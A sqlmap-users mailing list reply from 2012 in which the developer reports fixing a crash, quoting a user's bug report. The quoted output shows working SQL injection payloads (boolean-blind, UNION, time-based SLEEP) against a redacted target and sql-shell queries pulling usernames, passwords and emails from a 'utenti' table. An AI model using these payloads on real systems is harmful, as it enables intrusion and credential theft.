Re: [sqlmap-users] Bug Found in sql-shell!
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] Bug Found in sql-shell!
|
From: Miroslav S. <mir...@gm...> - 2012-04-04 23:17:02
|
Hi Marco. Thank you for your report and find it fixed with the latest r4969 commit. Kind regards, Miroslav Stampar On Wed, Apr 4, 2012 at 10:19 PM, Marco Mirandola <mm...@gm...> wrote: > [22:15:51] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file > [22:15:51] [INFO] testing connection to the target url > sqlmap identified the following injection points with a total of 0 HTTP(s) > reque > sts: > --- > Place: GET > Parameter: id > Type: boolean-based blind > Title: AND boolean-based blind - WHERE or HAVING clause > Payload: id=12' AND 7690=7690 AND 'coUR'='coUR > > Type: UNION query > Title: MySQL UNION query (NULL) - 2 columns > Payload: id=12' UNION ALL SELECT NULL, > CONCAT(0x3a6e617a3a,0x61476a577a70535 > 36676,0x3a6f61623a)# AND 'vhgF'='vhgF > > Type: AND/OR time-based blind > Title: MySQL > 5.0.11 AND time-based blind > Payload: id=12' AND SLEEP(5) AND 'oxZQ'='oxZQ > --- > > [22:15:51] [INFO] the back-end DBMS is MySQL > > web application technology: Apache > back-end DBMS: MySQL 5.0.11 > [22:15:51] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press > ENTER > sql-shell> select nick, pws from utenti > [22:15:56] [INFO] fetching SQL SELECT statement query output: 'select > nick, pws > from utenti' > select nick, pws from utenti: 'None' > > sql-shell> select nick, pws from utenti > [22:16:08] [INFO] fetching SQL SELECT statement query output: 'select > nick, pws > from utenti' > select nick, pws from utenti: 'None' > > sql-shell> select nick, pws, mail from utenti > [22:16:32] [INFO] fetching SQL SELECT statement query output: 'select > nick, pws, > mail from utenti' > [22:16:32] [INFO] the SQL query provided has more than a field. sqlmap > will now > unpack it into distinct queries to be able to retrieve the output even if > we are > going blind > [22:16:32] [INFO] resumed: 4 > the SQL query provided can return 4 entries. How many entries do you want > to ret > rieve? > [a] All (default) > [#] Specific number > [q] Quit > > a > > [22:16:36] [INFO] retrieving the length of query output > > [22:16:36] [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your > run with > the latest development version from the Subversion repository. If the > exception > persists, please send by e-mail to sql...@li...the follo > wing text and any information required to reproduce the bug. The > developers will > try to reproduce the bug, fix it accordingly and get back to you. > sqlmap version: 1.0-dev > Python version: 2.7.2 > Operating system: nt > Command line: P:\SQl INJECTION\sqlmap\sqlmap.py -u > ***************************** > *********************** --sql-shell --threads=5 > Technique: BOOLEAN > Back-end DBMS: MySQL (fingerprinted) > Traceback (most recent call last): > File "P:\SQl INJECTION\sqlmap\_sqlmap.py", line 82, in main > start() > File "P:\SQl INJECTION\sqlmap\lib\controller\controller.py", line 573, > in star > t > action() > File "P:\SQl INJECTION\sqlmap\lib\controller\action.py", line 121, in > action > conf.dbmsHandler.sqlShell() > File "P:\SQl INJECTION\sqlmap\plugins\generic\enumeration.py", line > 2451, in s > qlShell > output = self.sqlQuery(query) > File "P:\SQl INJECTION\sqlmap\plugins\generic\enumeration.py", line > 2397, in s > qlQuery > output = inject.getValue(query, fromUser=True) > File "P:\SQl INJECTION\sqlmap\lib\request\inject.py", line 439, in > getValue > value = __goInferenceProxy(query, fromUser, expected, batch, unpack, > charset > Type, firstChar, lastChar, dump) > File "P:\SQl INJECTION\sqlmap\lib\request\inject.py", line 306, in > __goInferen > ceProxy > output = __goInferenceFields(expression, expressionFields, > expressionFieldsL > ist, payload, expected, num, charsetType=charsetType, firstChar=firstChar, > lastC > har=lastChar, dump=dump) > File "P:\SQl INJECTION\sqlmap\lib\request\inject.py", line 115, in > __goInferen > ceFields > output = __goInference(payload, expressionReplaced, charsetType, > firstChar, > lastChar, dump) > File "P:\SQl INJECTION\sqlmap\lib\request\inject.py", line 70, in > __goInferenc > e > _, length, _ = queryOutputLength(expression, payload) > File "P:\SQl INJECTION\sqlmap\lib\utils\resume.py", line 74, in > queryOutputLen > gth > count, length = bisection(payload, lengthExprUnescaped, expected= > EXPECTED.IN > T, charsetType=CHARSET_TYPE.DIGITS) > TypeError: bisection() got an unexpected keyword argument 'expected' > > [*] shutting down at 22:16:36 > > > ------------------------------------------------------------------------------ > Better than sec? Nothing is better than sec when it comes to > monitoring Big Data applications. Try Boundary one-second > resolution app monitoring today. Free. > http://p.sf.net/sfu/Boundary-dev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
